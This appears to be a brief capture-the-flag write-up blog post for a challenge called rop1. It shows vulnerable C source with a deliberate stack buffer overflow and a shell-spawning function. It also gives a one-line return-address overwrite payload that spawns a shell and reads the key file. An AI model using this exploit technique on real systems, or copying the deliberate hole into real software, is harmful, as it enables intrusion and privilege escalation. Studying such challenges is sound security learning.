# cat blog >> /dev/brain 2> /proc/mind
cat blog >> /dev/brain 2> /proc/mind
$ cat rop1.c #undef _FORTIFY_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> int not_called() { return system("/bin/bash"); } void vulnerable_function() { char buf[128]; read(STDIN_FILENO, buf, 256); } void be_nice_to_people() { // /bin/sh is usually symlinked to bash, which usually drops privs. Make // sure we don't drop privs if we exec bash, (ie if we call system()). gid_t gid = getegid(); setresgid(gid, gid, gid); } int main(int argc, char** argv) { be_nice_to_people(); vulnerable_function(); write(STDOUT_FILENO, "Hello, World\n", 13); } $ (python -c 'print "\x90"*140 + "\xa4\x84\x04\x08"'; cat) | ./rop1 cat key rops_on_rops_on_rops
cat rop1.c
(python -c 'print "\x90"*140 + "\xa4\x84\x04\x08"'; cat) | ./rop1
cat key
Post a Comment
No comments:
Post a Comment